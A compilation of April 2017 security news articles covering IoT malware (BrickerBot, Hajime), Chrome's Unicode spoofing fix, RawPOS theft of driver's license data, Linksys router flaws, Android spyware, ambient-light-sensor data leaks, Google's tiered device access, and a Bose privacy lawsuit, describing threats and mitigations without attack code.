While BrickerBot.1 has been active for only about a week, between March 20 and March 25, BrickerBot.2 continues to operate. What is not known for the time being, however, is what type of devices are used to launch these attacks, or how many of them are.

In a new announcement, Radware reveals that the IP camera they tested the discovered malware on stopped working completely, and that a factory reset didn’t restore functionality. The security firm also notes that users might not even be aware of the malware attack, and could simply believe they bought faulty hardware.

ICS-CERT says it is working on identifying vendors of affected devices and on collecting detailed mitigation information. Until that happens, however, users can take some steps to protect their devices, such as changing the default credentials, disabling Telnet access to the device, and setting intrusion protection systems to block Telnet default credentials or reset Telnet connections.

These steps should keep devices protected from other threats as well, including Mirai, the distributed denial of service botnet that has been wreaking havoc among insecure IoT devices for more than half a year.

Users can also use network behavioral analysis to detect anomalies in traffic, along with automatic signature generation for protection. Ubiquiti Networks device owners are also advised to update to the latest firmware. Using strong passwords and disabling or renaming default system accounts should also help improving protection.

“ICS-CERT strongly encourages asset owners not to assume that their control systems are deployed securely or that they are not operating with an Internet accessible configuration. Instead, asset owners should thoroughly audit their networks for Internet facing devices, weak authentication methods, and component vulnerabilities. Control systems often have Internet accessible devices installed without the owner’s knowledge, putting those systems at increased risk of attack,” ICS-CERT’s alert reads.

The fact that new malware targeting IoT devices can permanently disable them shouldn’t come as a surprise, Bill Diotte, CEO, Mocana Corporation, told SecurityWeek in an emailed statement.

“IoT designers and manufacturers must start presuming that their devices will be subject to attack the minute they are connected to the Internet. The industry needs to make security as high a priority as performance and free overnight shipping,” Diotte said.


Chrome Addresses Threat of Unicode Domain Spoofing

21.4.2017 securityweek Phishing
Chrome 58 Resolves Unicode Domain Spoofing

Google on Wednesday released Chrome 58 to the stable channel for Windows, Mac and Linux to address 29 vulnerabilities, including an issue that rendered users vulnerable to Unicode domain phishing.

Demonstrated by web developer Xudong Zheng, the bug resides in the use of Unicode characters in Internet hostnames through Punycode. By using characters that may look the same but are represented differently in Punycode, malicious actors can spoof legitimate websites and use them in phishing attacks.

The issue was also demonstrated by Avanan researchers in December 2016, when they stumbled upon live phishing attacks targeting Office 365 business email users. Using Unicode characters, attackers could create a site looking like http://www.pаypal.com/, but which actually resolved to http://www.xn--pypal-4ve.com/, thus bypassing Office 365’ anti-phishing defenses, the researchers explained.

Chrome 58 addresses the bug, which Google refers to as an URL spoofing in Omnibox (CVE-2017-5060). Assessed only a Medium severity rating, the vulnerability earned Xudong Zheng a $2000 bounty.

Two other Medium risk URL spoofing in Omnibox flaws were addressed as well: CVE-2017-5061, discovered by Haosheng Wang (awarded $2000), and CVE-2017-5067, credited to Khalil Zhani (awarded $500).

Only 12 of the 29 security fixes in Chrome 28 were for flaws discovered by external researchers: three rated High severity, 8 Medium risk, and one Low severity.

The High risk flaws include a Type confusion in PDFium (CVE-2017-5057), found by Guang Gong of Alpha Team, Qihoo 360 ($3000); a Heap use after free in Print Preview (CVE-2017-5058), discovered by Khalil Zhani ($2000); and a Type confusion in Blink (CVE-2017-5059), credited to SkyLined working with Trend Micro's Zero Day Initiative.

The Medium severity bugs also included a Use after free in Chrome Apps (CVE-2017-5062), a Heap overflow in Skia (CVE-2017-5063), a Use after free in Blink (CVE-2017-5064), Incorrect UI in Blink (CVE-2017-5065), and Incorrect signature handing in Networking (CVE-2017-5066).

The Low severity vulnerability was a Cross-origin bypass in Blink tracked as CVE-2017-5069 and was discovered by Michael Reizelman.


RawPOS Malware Steals Driver's License Information

21.4.2017 securityweek Virus
The RawPOS Point-of-Sale (PoS) RAM scraper malware was recently observed stealing driver’s license information from victims, Trend Micro has discovered.

RawPOS is one of the oldest PoS malware families out there, with patterns matching its activity dating as far back as 2008. Over time, the actors behind it have focused mainly on the hospitality industry, and have been using the same malware components and tools for lateral movement.

These actors have since started gathering additional information from the compromised systems, which put victims at greater risk of identity theft, researchers warn. The driver’s license information stolen by the malware can be used by cybercriminals in their malicious activities.

RawPOS, Trend Micro explains, attempts to gather both credit card mag stripe data and other types of valuable information in a single sweep, while modifying the regex string to capture the needed data. The malware scans processes to find “track data”-like strings in memory. It then dumps process memory for a file scraper to organize the data.

The threat used almost the same pattern matching for the first eight years, but changed it in 2016 to start looking for “drivers” and “license” strings, as well as for an “ANSI 636” string. This is a mandatory PDF417 bar code to aid in “identity and age verification, automation of administrative processing, and address verification,” as defined in the 2013 North American AAMVA DL/ID Card Design Standard.

Because the numbers “636” are the initial digits of the Issuer Identification Number (IIN) for most US states, the security researchers concluded that the actors were interested in driver’s license information within the US.

“The Information stored in each license varies per state, but the bar code mostly contains the same information present in each individual driver’s license or state ID – specifically: full name, date of birth, full address, gender, height, even hair and eye color,” Trend Micro says.

The use of this barcode isn’t unheard of, albeit it is less common than credit card swipes, the security researchers explain. The driver’s license barcode could get scanned in pharmacies, retail shops, bars, casinos and others establishments that require it.

The use of personal information next to the stolen credit card details provides threat actors with a more “authentic” identity, while also allowing them to complete a transaction even if they don’t have the physical card.

“Aside from this, the driver’s license bar code swipe of the victims can also be used for other kinds of misrepresentation, such as identity theft. In any case, stolen Personal Identity Information (PII) will always be a serious issue that can lead to dire consequences for its victims,” the security researchers explain.


Anatomy of Cybercriminal Communications: Why do crooks prefer Skype
21.4.2017 securityaffairs CyberCrime

Security firm Flashpoint published an interesting paper titled, ‘Cybercrime Economy: An Analysis of Cybercriminal Communication Strategies‘ about cybercriminal communications of threat actors.
A recent research by the threat intelligence firm Flashpoint has uncovered how malicious threat actors communicate to share information between them.

The research has found out that there is a growing economy in the cybercriminals communications, more than just information sharing it has formed an ecosystem in which the failures, successes, planning and procedures to beat the organization’s countermeasures are shared as well as the planning of attacks.

The research points out that Cybercriminal Communications use a variety of software alongside with the access to communities in the deep and dark web. This is done in order to carry out cross domain organization for commit crimes like phishing, credit card fraud, spam, and every sort of attack that pass through the corporations’ filters and defenses.

Cybercriminal Communications

The reason for the use of this software to communicate is too difficult law enforcement agencies from tracking the activities in the community’s forums as well as to give privacy to the user since most of these programs have cryptographic functions or protocols operating in its core. The software also allows a user to enter random, aleatory or even fraudulent information about the user which difficulty, even more, the process of detection.

On the other hand, one other reason for doing so is the payment required to maintain a forum, which in many cases can represent a difficult for cybercriminals. The use of communications programs is free of charge and anyone can download them.

The study was carried out by monitoring underground communities where the users often invited other members to discuss the planning outside the underground forum. It was analyzed 80 instant messengers applications and protocols, of which at least five were more used.

Privacy is implemented in these applications, like PGP an algorithm of encryption. The secure communication of user’s difficulty authorities to gain access to the content shared between the users. Without knowing the encryption key that has generated the codification for the session.

The most used programs by cybercriminals are ICQ, Skype, Jaber, Quiet Internet Pager, Pretty Good Privacy, Pidgin, PSI and AOL Instant Messenger (AIM).

The report shows that the use of Cybercriminal Communications is different among communities of different languages, below are reported “Language Group Specific Findings” for Russians we have the following situation:

1. Jabber (28.3%) 2. Skype (24.26) 3. ICQ (18.74%) 4. Telegram (16.39%) 5. WhatsApp (3.93%) 6. PGP (3.79%) 7. Viber (3.01%) 8. Signal (1.58%)

while for the Chinese we have the following distribution in 2016: 1. QQ (63.33%) 2. WeChat (35.58%) 3. Skype (0.44%) 4. WhatsApp (0.22%) 5. Jabber (0.31%) 6. PGP (0.13%) 7. ICQ (0.1%) 8. AOL Instant Messenger (0.08%)

“Cybercriminals can choose from a wide variety of platforms to conduct their peer-to-peer (P2P) communications.” states the report. “This choice is typically influenced by a combination of factors, which can include:

Ease of use
Country and/or Language
Security and/or anonymity concerns
Sources:

http://www.securityweek.com/many-cybercriminals-prefer-skype-communications-study

http://www.ibtimes.co.uk/skype-whatsapp-how-cybercriminals-share-hacking-tips-tricks-online-1617822

http://www.itnews.com/article/3190830/security/report-cybercriminals-prefer-skype-jabber-and-icq.html

http://www.infoworld.com/article/3190563/encryption/cybercriminals-prefer-to-chat-over-skype.html

https://www.flashpoint-intel.com/blog/cybercrime/cybercriminal-communication-strategies/


Vulnerabilities in Linksys routers allow attackers to hijack dozens of models
21.4.2017 securityaffairs Vulnerebility

Cyber security experts disclosed the existence of 10 unpatched security flaws in dozens of Linksys routers widely used today.
The IOActive senior security consultant Tao Sauvage and the independent security researcher Antide Petit have reported more than a dozen of unpatched security vulnerabilities affecting 25 different Linksys Smart Wi-Fi Routers models.

The security duo published a blog post on Wednesday providing details of their discoveries.Attackers can exploit the security vulnerabilities to extract sensitive information from the devices, trigger DoS conditions, change settings, and completely take them over.The vulnerabilities effects dozens of Linksys models, including EA3500 Linksys Smart Wi-Fi, WRT and Wireless-AC series.Linksys routers flaws
Out of 10 security vulnerabilities, six issues can be exploited by remote unauthenticated attackers.

All these products are widely by private users and by small businesses, for this reason, the impact of the discovery is huge. It has been estimated that over 7,000 routers that have their web-based administrative interfaces exposed to the Internet are exposed to attacks.

The experts discovered determined that 11 percent of the 7,000 Linksys routers still used default credentials.

“We performed a mass-scan of the ~7,000 devices to identify the affected models. In addition, we tweaked our scan to find how many devices would be vulnerable to the OS command injection that requires the attacker to be authenticated. We leveraged a router API to determine if the router was using default credentials without having to actually authenticate.” reads the blog post published by the two experts.
“We found that 11% of the ~7000 exposed devices were using default credentials and therefore could be rooted by attackers.”

Most of the flawed Linksys routers (~69%) are located in the USA, followed by Canada (~10%), Hong Kong (~1.8%), Chile (~1.5%), and the Netherlands (~1.4%).

If we consider the possibility that a local attacker exploits the issues to target systems over a local area network, the number of devices at risk dramatically increases.

The experts avoided to provided technical details about the flaw in the Linksys routers to avoid mass attacks against the vulnerable devices. The duo confirmed that two of the flaws could be exploited to trigger a denial-of-service condition on flawed routers, making them unusable or reboot by sending specifically crafted requests to a specific API.

Other vulnerabilities affecting the web interfaces of the Linksys routers allow attackers to bypass authentication and access many CGI scripts that can reveal sensitive information about the flawed devices and their configurations. An attacker can exploit the issues to obtain the Wi-Fi Protected Setup (WPS) PIN and to access the wireless network for further lateral movement from within. An attacker can exploit the vulnerability to determine firmware and kernel versions of the vulnerable Linksys routers and obtain a list of running processes, information about computers connected to the routers, a list of USB devices and the configuration settings for the FTP and SMB file-sharing servers.

The most severe flaw discovered by the experts could be exploited by attackers to inject and execute shell commands with root privileges on the affected routers. The flaw could be exploited to set up a backdoor administrative account that wouldn’t be listed in the web interface.

“Finally, authenticated attackers can inject and execute commands on the operating system of the router with root privileges. One possible action for the attacker is to create backdoor accounts and gain persistent access to the router. Backdoor accounts would not be shown on the web admin interface and could not be removed using the Admin account.” states the post.The flaw requires authentication to be exploited, this means the attackers need to have access to an existing account.

“It should be noted that we did not find a way to bypass the authentication protecting the vulnerable API; this authentication is different than the authentication protecting the CGI scripts.”

Linksys confirmed it is currently working on firmware updates to fix the vulnerabilities, meantime, as mitigation measures it suggests users disable the guest Wi-Fi network feature on their routers.

“Linksys was recently notified of some vulnerabilities in our Linksys Smart Wi-Fi series of routers.
As we work towards publishing firmware updates, as a temporary fix, we recommend that customers using Guest Networks on any of the affected products below temporarily disable this feature to avoid any attempts at malicious activity.” states the advisory. “We
will be releasing firmware updates for all affected devices.”

The complete list of vulnerable Linksys routers is reported in the security advisory issued by the company.


The RawPOS PoS Malware also scans for driver’s license data
21.4.2017 securityaffairs Virus

According to Trend Micro, the RawPOS PoS malware was recently used to steal driver’s license information from victims.
Security experts at Trend Micro have spotted a new variant of the RawPOS PoS malware stealing driver’s license information from victims.

The RawPOS PoS malware is an old threat that has been active since 2008. RAWPOS is a memory scraper that has infected lodging merchants since 2008 by targeting the memory dump where payment information may be temporarily stored, and that data are staged on a network and removed later by a separate process.

RawPOS PoS Malware

The malicious code was mainly used against targets in the hospitality industry, aver the time crooks used it to steal also additional information from victims.

Back to the present, crooks steal driver’s license information for several fraudulent activities. According to Trend Micro, the version of the RawPOS PoS malware recently spotted attempts to gather both credit card mag stripe data and other valuable information in a single sweep.

“Traditionally, PoS threats look for credit card mag stripe data and use other components such as keyloggers and backdoors to get other valuable information. RawPOS attempts to gather both in one go, cleverly modifying the regex string to capture the needed data.” reads the analysis published by TrendMicro.

The RawPOS PoS malware uses regular expressions to scan processes for strings that look like data stored in the magnetic stripe in order to find “track data”-like strings in memory.

The analysis of the regular expressions used by the threat demonstrates that starting from 2016 the malware scans memory for “drivers” and “license” strings, as well as for an “ANSI 636” string (“636” are the initial digits of the Issuer Identification Number (IIN) for most US states).

Crooks behind the last variant of the PoS malware were interested in driver’s license information belonging to US citizens.

“The Information stored in each license varies per state, but the bar code mostly contains the same information present in each individual driver’s license or state ID – specifically: full name, date of birth, full address, gender, height, even hair and eye color,” continues Trend Micro.

Researchers explained that driver’s license barcode could get scanned in many commercial activities, including pharmacies, retail shops, bars, and casinos.

The availability of personal information along with credit card data provides threat actors with a more “authentic” identity.

“Combining personal information combined with credit card information gives threat actors a more “authentic” identity, and also provides all the information necessary to complete a transaction despite the lack of a physical card. “concluded Trend Micro.” Aside from this, the driver’s license bar code swipe of the victims can also be used for other kinds of misrepresentation, such as identity theft. ”


Beware! Dozens of Linksys Wi-Fi Router Models Vulnerable to Multiple Flaws
20.4.2017 thehackernews  Vulnerebility
Bad news for consumers with Linksys routers: Cybersecurity researchers have disclosed the existence of nearly a dozen of unpatched security flaws in Linksys routers, affecting 25 different Linksys Smart Wi-Fi Routers models widely used today.
IOActive's senior security consultant Tao Sauvage and independent security researcher Antide Petit published a blog post on Wednesday, revealing that they discovered 10 bugs late last year in 25 different Linksys router models.
Out of 10 security issues (ranging from moderate to critical), six can be exploited remotely by unauthenticated attackers.
According to the researchers, when exploited, the flaws could allow an attacker to overload the router, force a reboot by creating DoS conditions, deny legitimate user access, leak sensitive data, change restricted settings and even plant backdoors.
Many of the active Linksys devices exposed on the internet scanned by Shodan were using default credentials, making them susceptible to the takeover.
Researchers found more than 7,000 devices impacted by the security flaws at the time of the scan, though this does not include routers protected by firewalls or other network protections.
"We performed a mass-scan of the ~7,000 devices to identify the affected models," IOActive says. "We found that 11% of the ~7000 exposed devices were using default credentials and therefore could be rooted by attackers."
IOActive made Linksys aware of the issues in January this year and is working "closely and cooperatively" with the company ever since to validate and address the vulnerabilities.
Here's How critical are these Flaws:
The researchers did not reveal more details about the vulnerabilities until the patch is made available to users, although they said two of the flaws could be used for denial-of-service attacks on routers, making them unresponsive or reboot by sending fraudulent requests to a specific API.
Other flaws could allow attackers to bypass CGI scripts to collect sensitive data such as firmware versions, Linux kernel versions, running processes, connected USB devices, Wi-Fi WPS pins, firewall configurations, FTP settings, and SMB server settings.
CGI, or Common Gateway Interface, is a standard protocol which tells the web server how to pass data to and from an application.
Researchers also warned that attackers those have managed to gain authentication on the devices can inject and execute malicious code on the device's operating system with root privileges.
With these capabilities in hands, attackers can create backdoor accounts for persistent access that are even invisible in the router smart management console and so to legitimate administrators.
However, researchers did not find an authentication bypass that can allow an attacker to exploit this flaw.
List of Vulnerable Linksys Router Models:
Here's the list of Linksys router models affected by the flaws:
EA2700, EA2750, EA3500, EA4500v3, EA6100, EA6200, EA6300, EA6350v2, EA6350v3, EA6400, EA6500, EA6700, EA6900, EA7300, EA7400, EA7500, EA8300, EA8500, EA9200, EA9400, EA9500, WRT1200AC, WRT1900AC, WRT1900ACS, and WRT3200ACM.
The majority of the exposed devices (nearly 69%) are located in in the United States, and others are spotted in countries including Canada (almost 10%), Hong Kong (nearly 1.8%), Chile (~1.5%), and the Netherlands (~1.4%).
A small percentage of vulnerable Linksys routers have also been spotted in Argentina, Russia, Sweden, Norway, China, India, UK, and Australia.
Here's How you can Mitigate Attacks originating from these Flaws:
As temporary mitigation, Linksys recommended its customers to disable the Guest Network feature on any of its affected products to avoid any attempts at the malicious activity.
The company also advised customers to change the password in the default account in order to protect themselves until a new firmware update is made available to patch the problems.
Linksys is working to release patches for reported vulnerabilities with next firmware update for all affected devices. So users with Smart Wi-Fi devices should turn ON the automatically update feature to get the latest firmware as soon as the new versions arrive.


Millions Download "System Update" Android Spyware via Google Play

20.4.2017 securityweek Android
Millions of users looking to get Android software updates have been tricked into downloading spyware on their devices through the Google Play marketplace, Zscaler reveals.

Posing as a legitimate application called “System Update” and claiming to provide users with access to the latest Android software updates, the spyware made it to Google Play in 2014, and has registered between 1,000,000 and 5,000,000 downloads by the time Google was alerted and removed it from the store.

Instead of delivering to its promise, however, the malware spies on users’ exact geolocation, and can send it to the attacker in real time. It receives commands from its operator via SMS messages, the security researchers explain.

The application’s Google Play page should have been a warning to users that it wasn’t what it appeared to be, given that it displayed blank screenshots and users were complaining about its lack of functionality, yet many still downloaded and installed it. The page also stated that the “application updates and enables special location features.”

When the user attempts to run the installed app, however, an error message is displayed: “Unfortunately, Update Service has stopped.” In the background, the application sets up an Android service and broadcast receiver to fetch the last known location and scan for incoming SMS messages.

The spyware is looking for incoming messages that feature a specific syntax, Zscaler explains: “the message should be more than 23 characters and should contain ‘vova-’ in the SMS body. It also scans for a message containing ‘get faq’.”

The attacker can set a location alert when the device’s battery is running low, and can also set their own password for the spyware (the application comes with the default password “Vova”). After a phone number and password are set, the spyware starts a process to send the device’s location to the attacker.

“The SMS-based behavior and exception generation at the initial stage of startup can be the main reason why none of the antivirus engines on VirusTotal detected this app at the time of analysis,” Zscaler explains.

The application was last updated in December 2014 and managed to evade detection for a long time, but its functionality remained active. What’s more, the security researchers discovered the same code for stealing a victim’s location as the DroidJack Trojan that was discovered several years ago, and which was recently posing as fake Pokemon GO and Super Mario Run games for Android.

“There are many apps on the Google Play Store that act as a spyware; for example, those that spy on the SMS messages of one’s spouse or fetch the location of children for concerned parents. But those apps explicitly state their purpose, which is not the case with the app [in] this report. It portrayed itself as a system update, misleading users into thinking they were downloading an Android System Update,” Zscaler concludes.


Ambient Light Sensors Put Browser Data at Risk: Researchers

20.4.2017 securityweek Security
The ambient light sensors present in phones, tablets and laptops can be abused to obtain potentially sensitive information from a user’s web browser, researchers warned.

Ambient light sensors measure light intensity in the environment, which is useful for adjusting the brightness of the display and for proximity detection. The data collected by the sensor is fairly precise and the frequency of readings is relatively high.

Last year, researcher Lukasz Olejnik analyzed theoretical security and privacy implications of ambient light sensors. The expert recently teamed up with Artur Janc and they demonstrated how the W3C’s ambient light sensor API can be abused to steal data from web browsers.

Some members of the industry have proposed allowing websites to access ambient and other sensors without requiring explicit permission from the user. Recent versions of Firefox and Chrome have already implemented the W3C API – it’s enabled by default in the former and it can be manually activated in the latter.

Proof-of-concept (PoC) exploits created by the researchers show how an attacker can determine a user’s browsing history based on the color of links, and how they can steal cross-origin resources, such as images and frames.

In order to determine which websites have been visited by a user, Olejnik and Janc relied on the fact that a site can apply different styles to links that have been visited and ones that have not been accessed.

An attacker can create a webpage that sets link styles to white for visited links and black for not-visited links. The attacker’s page then starts displaying a list of popular domain names one by one. If a link has been visited, the screen turns white; if it hasn’t been accessed, it turns black. The ambient sensor can log the light level when each link is displayed, and determine if that website had been accessed by the user.
Researchers also demonstrated how an attacker can steal cross-origin resources, such as account recovery QR codes. In this case, the hacker’s website embeds an image of the QR code from the targeted domain into their own site. The image is converted to monochrome using SVG filters, and it’s scaled so that each pixel is expanded one by one to fill up the screen. The exploit goes through each pixel, and the ambient sensor logs a white or black pixel depending on what is on the screen.
In their experiments, researchers determined that this technique can be used for a fully reliable exploit at a rate of one bit per 500 ms. At this rate, an attacker can exfiltrate an 8-character password in 24 seconds, a 20x20 QR code in 3 minutes and 20 seconds, and a 64x64 pixel image in just over half an hour. As for stealing a user’s browsing history, it takes 8 minutes and 20 seconds to go through 1,000 popular URLs and determine if they have been visited.

While it’s unlikely that such an obvious attack can be carried out while the phone is used, Olejnik and Janc pointed out that an attack can be conducted at night via a site that uses the screen.keepAwake API to keep the display on while the exploit is running.

Researchers believe these types of attacks could be prevented by limiting the frequency of sensor readings. An even more efficient mitigation involves limiting the precision of sensor output (i.e. make it difficult for the color of the screen to influence the sensor reading).

Attacks can also be prevented if browser vendors require users to grant permission before giving websites access to the sensor. Both Google and Mozilla have been notified of the potential risks.


This is How Google Secures Devices for Its 61,000 Employees

20.4.2017 securityweek Safety
Google Details Its Implemenation of Tiered Access to Secure Devices for More Than 61,000 Employees

The easiest solution to access control is binary: network access is either granted or denied. It's a blunt tool that doesn't suit the modern business culture of maximizing user productivity and creativity. Granularity in access control, allowing users to access what is needed when it is needed, is a more suitable model for the modern business.

Google chose the Tiered Access model for its own workforce of some 61,000 employees. In a new whitepaper (PDF) and blog published today, it explains that it has "a culture of innovation that requires the freedom and flexibility to connect many different devices to many different assets and services."

This is an attitude that will resonate with many modern businesses.

"Tiered access was implemented in order to provide an access model appropriate for [Google's] very heterogeneous environment. It helps ensure the security of corporate resources while allowing users to make informed trade-offs around access and security controls." Many organizations offer their staff flexibility in the devices they use -- especially where a BYOD policy is in place.

Tiered access is achieved by first analyzing the client base devices and data sources; analyzing the services that are to be accessed; and choosing a gateway/access technology that can evaluate policies and make access decisions between the client base and service.

How Google Secures Devices on its Network

Google uses its own internally developed tools to collect the device data; but suggests other companies could use security reporting systems (logs), patch management systems, asset management systems and centralized management dashboards. The purpose is to gather device attributes and device state into a central repository.

The device attributes allow the definition of device baselines, based on things like vendor and operating system, and built-in security features. The device state, continuously monitored, highlights deviations from the device baseline. These two attributes can be used to associate devices to the different tiers.

"For example," explains Google, "an Android device at Google may access more sensitive data in higher trust tiers if it is a 'Fully Managed' device, meaning it provides full device control and access to detailed system and network logs." A lower trust tier is made accessible to BYOD devices with a work profile.

Between the device and the service sits an Access Control Engine that provides a service-level authorization to enterprise applications on a per-request basis. It queries the central repository in order to make policy decisions on what access is allowable -- it is where policy is defined and managed by security.

The 'tiers' in tiered access are levels of sensitivity applied to the organization's different services. Google uses just four tiers: untrusted; basic access; privileged access; and highly privileged access. It chose four tiers as a compromise between too many (making the system over-complex), and too few (which effectively recreates the binary access that the tiered approach seeks to improve).

Tiered access

While this is the current state of Google's tiered access solution to its on-site and mobile workforces, development is ongoing. It has four areas currently under consideration. The first is to increase the granularity of the system by improving "the precision of access decisions while balancing the need for users to understand security requirements."

The second is to add user attributes to the device attributes by considering "the user’s observed behavior and how that compares to normal activity as analyzed with machine learning." This will allow access based on both the device and current user behavior.

The third is to drive self-selection of trust tiers by encouraging people to voluntarily move across trust tiers in real-time; for example, to be at 'fully trusted' for the next two hours only.

Finally, Google hopes to improve the service on-boarding process. Since services are added or updated all the time, they all need to be classified in terms of risk and sensitivity. "To scale," suggests Google, "service owners must be empowered to make the right tier assignments themselves, which is a process that is constantly improving."

Google hopes that by sharing its own experiences in developing and deploying tiered access, IT and security admins will feel empowered to develop a flexible and powerful access control system that better suits today's business. Its Tiered Access project goes hand-in-hand with the larger BeyondCorp project that challenges traditional security assumptions that private or 'internal' IP addresses represented a 'more trusted' device than those coming from the internet. Part of BeyondCorp is discussed in the Google Infrastructure Security Design Overview.


White Hat Hacker Created Mysterious IoT Worm, Symantec Says

20.4.2017 securityweek IoT
Hajime IoT Worm Appears to be Work of White Hat Hacker

An Internet of Things (IoT) worm that targets the same devices as the infamous Mirai botnet appears to be the work of a white hat hacker, Symantec researchers say.

Dubbed Hajime, the worm was initially discovered in October, just weeks after Mirai’s code emerged online, and Rapidity Networks researchers estimated at the time it had infected between 130,000 and 185,000 devices. The malware was using the same username and password combinations as Mirai, and was focused on compromising the very same insecure IoT devices.

At the time, however, Rapidity Networks suggested that the malware could be only a research project, as it had no other components than the spread module. Basically, while Mirai remains focused on ensnaring devices to abuse them in distributed denial of service (DDoS) attacks, Hajime doesn't appear to have a malicious component.

Six months later, nothing has changed in this regard, and the worm continues to pack only the spread module, with its actual purpose still a mystery, Symantec says. However, the security researchers do note that the malware installs a backdoor on the compromised devices, which could be used for nefarious purposes.

At the moment the malware only fetches a statement from its controller and displays it on the terminal approximately every 10 minutes, researchers say. The statement claims that a white hat is behind the code, and that they are “securing some systems.”

The operator has the option to open a shell script to any infected machine in the network at any time, and has designed Hajime to accept only messages signed by a hardcoded key. Thus, it’s clear that the message Hajime displays on the terminal comes from the author.

Hajime is a peer-to-peer botnet, meaning that there is no single command and control (C&C) address that it has to connect to when receiving commands. Instead, its operator can push commands to the network and wait for them to propagate to all peers over time.

The malware appears more advanced compared to Mirai, and researchers discovered that it takes multiple steps in an attempt to hide its presence on the system. Courtesy of Hajime’s modular design, the operator can add new capabilities to it on the fly. According to Symantec, the author has invested a “fair amount of development time” in this creation.

“However, there is a question around trusting that the author is a true white hat and is only trying to secure these systems, as they are still installing their own backdoor on the system. The modular design of Hajime also means if the author’s intentions change they could potentially turn the infected devices into a massive botnet,” the security firm explained.

On the other hand, once it has infected a device, the malware attempts to improve security by blocking access to ports 23, 7547, 5555, and 5358. These ports are already known to be hosting services that are exploitable by many threats, including Mirai.

Hajime’s behavior is similar to that of the Wifatch, also known as the “vigilante malware,” and isn’t viewed as an effective approach to securing IoT devices. The effects of white worms are only temporary, because the changes are made only in RAM and cannot persist reboots.

“Once the device is rebooted it goes back to its unsecured state, complete with default passwords and a Telnet open to the world. To have a lasting effect, the firmware would need to be updated. It is extremely difficult to update the firmware on a large scale because the process is unique to each device and in some cases is not possible without physical access,” Symantec said.

This also means that there’s a constant battle between Hajime, Mirai and other IoT malware out there to take over exposed devices. This battle is a cycle that repeats after each device reboot. Only newer, more secure firmware can end it, researchers say.

As it turns out, the worm’s author is keeping tracks of reports on the malware, and has adopted the Hajime name after Rapidity Networks called the threat this way last year, to keep it in line with Mirai’s Japanese naming (Mirai means “future” in Japanese, Hajime means “beginning”). Further, it appears that the author also addressed some bugs in the code after security researchers pointed them out in their October report.

According to Symantec, while it’s difficult to estimate the size of the network, “modest estimates put it in the tens of thousands.” The researchers also reveal that most of the infected machines are located in Brazil (19%), followed by Iran (17%), Thailand (11%), Russian Federation (11%), Turkey (8%), Vietnam (8%), Argentina (7%), Australia (7%), China (6%), and Taiwan (6%).

“What is needed to protect organizations from the perils of vulnerable IoT devices is a least privilege approach. IoT devices should be hard coded to only communicate with the local server or the manufacturer’s server across the Internet. Organizations should define policies aligned to the IP addresses and layer 4 ports these devices must use to operate and deny all others. Network Traffic Analysis technologies can be used to monitor traffic to and from IoT devices and alert if they send or receive any traffic that falls outside the least privilege policy,” Bob Noel, Director of Strategic Relationships and Marketing for Plixer International, told SecurityWeek in an emailed statement.


Bose Wireless Headphones Spy on Users, Lawsuit Claims

20.4.2017 securityweek CyberSpy
Bose Headphones Join the Internet of Spying Things

Bose wireless headphones, that sell for up to $350, collect the listening habits of users via an associated app. This data is transmitted to Bose, who then passes the data to a marketing company, a lawsuit alleges. One aggrieved user brought the class action suit against Bose, alleging infringement of the federal Wiretap Act and numerous state laws.

Illinois case 17-cv-2928, brought by Bose customer Kyle Zak "on behalf of others similarly situated" claims the case is worth more than $5 million; but without specifying damages, seeks a jury trial.

The lawsuit states that Bose introduced a mobile phone app, the Bose Connect, in 2016 to remotely control and manage the headphones via a Bluetooth connection. Bose advertised this with the claim, the "Bose Connect app unlocks current and future headphone features. Download now."

Unknown to the customer, states the lawsuit, Bose "designed Bose Connect to (i) collect and record the titles of the music and audio files its customers choose to play through their Bose wireless products and (ii) transmit such data along with other personal identifiers to third-parties -- including a data miner -- without its customers' knowledge or consent."

Since Bose also asks for the name, email address and the product's serial number, it is able to build detailed listening habits of known individuals.

These listening habits can help produce a personal profile of the customer. The lawsuit claims that "numerous scientific studies show that musical preferences reflect explicit characteristics such as age, personality, and values, and can likely even be used to identify people with autism spectrum conditions." Audio podcasts can be even more revealing, potentially identifying the race, religion, sexual orientation and health issues of the listener.

Such privacy issues usually revolve around the concept of informed consent. Zak claims that he would not have purchased the headphones had he been aware of the data collection. The privacy policy with the app, however, makes it clear that Bose collects data, tracks the user and shares that data. "We share the information that we collect with a variety of third parties. Additionally, other third parties collect information directly through the app."

This clear statement would be a red flag to any privacy-conscious user. However, by the time it is seen, the user will almost certainly have already spent up to $350 on the headphones themselves. Although they can function without the app, it is the app that maximizes their quality.

Zak is represented by Christopher Dore, a partner at Edelson PC. According to Reuters, Edelson specializes in suing technology companies over alleged privacy violations. Dore told Reuters that customers do not see the Bose app's user service and privacy agreements when signing up, and the privacy agreement says nothing about data collection.

This last comment is either wrong, or the app's privacy policy has since been updated.

In February 2017, Smart TV manufacturer Vizio agreed to pay an FTC settlement of $2.2 million over allegations that it collected information on users viewing habits without their knowledge. Although the settlement did not include an admission of 'guilt', Vizio will now prominently display its wish to collect data, and ensure it obtains affirmative express consent.

Late last year, a team of researchers demonstrated how a piece of malware could spy on users by silently turning their headphones into a microphone that can capture audio data from a significant distance. Early this year, German regulators banned an internet-connected doll called "My Friend Cayla" after warning that it was a de facto "spying device".


Experts Find 10 Flaws in Linksys Smart Wi-Fi Routers

20.4.2017 securityweek Vulnerebility

Researchers at IOActive have analyzed Linksys routers and discovered a total of 10 vulnerabilities. Patches have yet to be released, but the vendor has provided some mitigation advice.

The research has focused on Linksys routers that support the Smart Wi-Fi feature, which enables users to manage and control their home wireless network remotely from a mobile application. According to Linksys, the vulnerabilities found by IOActive affect 25 EA and WRT series routers.

IOActive will not disclose any specific information until Linksys releases firmware updates and users have had a chance to patch their devices. However, experts said the vulnerabilities they have identified can be exploited to cause a denial-of-service (DoS) condition, obtain potentially sensitive data, and even to plant backdoors.Linksys routers vulnerable to attacks

Two of the flaws can be used for DoS attacks. Unauthenticated hackers can cause the router to become unresponsive or reboot by sending specially crafted requests to a specific API. Exploitation of these flaws disrupts network connections and prevents device administrators from accessing the web interface.

Authentication bypass vulnerabilities allow attackers to access certain CGI scripts that provide access to various types of information, including firmware and Linux kernel versions, running processes, connected USB devices, and the WPS PIN. Attackers can also collect data on firewall configurations, FTP settings, and SMB server settings.

IOActive also warned that attackers who do manage to log in to the router can inject and execute commands on the device’s operating system with root privileges. This allows them to create backdoor accounts that are not visible to legitimate administrators.

However, researchers pointed out that they did not manage to find an authentication bypass that can allow an attacker to exploit this vulnerability – the authentication bypass they did find only provides access to some CGI scripts, not the API that enables these more damaging attacks.

